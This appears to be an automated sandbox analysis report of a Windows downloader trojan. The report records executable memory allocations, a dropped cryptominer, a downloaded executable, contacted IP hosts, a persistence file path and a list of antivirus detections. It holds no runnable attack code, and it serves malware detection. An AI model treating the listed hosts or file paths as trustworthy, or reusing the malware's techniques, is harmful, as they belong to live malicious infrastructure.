protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9497d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94a91000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9493b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94aa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94aa1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94aa2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94aa3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94aa4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94aa5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe94aa6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
file C:\ProgramData\MinerFull.exe
file C:\ProgramData\MinerFull.exe
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

recv

buffer: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 4164096 Content-Type: application/x-ms-dos-executable Last-Modified: Sun, 10 Apr 2022 21:10:36 GMT Date: Tue, 12 Apr 2022 08:26:52 GMT MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÊ^=_à 0d?$î‚?  ?@ @ é?`…˜‚?S ? à?  H.textôb? d? `.rsrc  ?"f?@@.reloc à?ˆ?@B
received: 708
socket: 900
1 708 0
section {u'size_of_data': u'0x0004c000', u'virtual_address': u'0x00002000', u'entropy': 7.826858636634115, u'name': u'.text', u'virtual_size': u'0x0004be84'} entropy 7.82685863663 description A section with a high entropy has been found
entropy 0.817204301075 description Overall entropy of this PE file is high
host 107.189.6.214
host 5.188.119.76
file C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe
Lionic Trojan.MSIL.Startun.4!c
MicroWorld-eScan Gen:Variant.MSILHeracles.37277
McAfee Artemis!BCAAF37E0BEB
BitDefender Gen:Variant.MSILHeracles.37277
CrowdStrike win/malicious_confidence_100% (W)
Symantec MSIL.Downloader!gen9
Elastic malicious (moderate confidence)
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Trojan.MSIL.Startun.gen
Ad-Aware Gen:Variant.MSILHeracles.37277
Sophos Mal/Generic-S
McAfee-GW-Edition Artemis!Trojan
FireEye Generic.mg.bcaaf37e0beb6717
Emsisoft Gen:Variant.MSILHeracles.37277 (B)
GData Gen:Variant.MSILHeracles.37277
MAX malware (ai score=81)
Arcabit Trojan.MSILHeracles.D919D
Microsoft Trojan:Win32/Sabsik.FL.B!ml
Cynet Malicious (score: 100)
ALYac Gen:Variant.MSILHeracles.37277
Cylance Unsafe
TrendMicro-HouseCall TROJ_GEN.R002H09DC22
AVG TrojanX-gen [Trj]
Avast TrojanX-gen [Trj]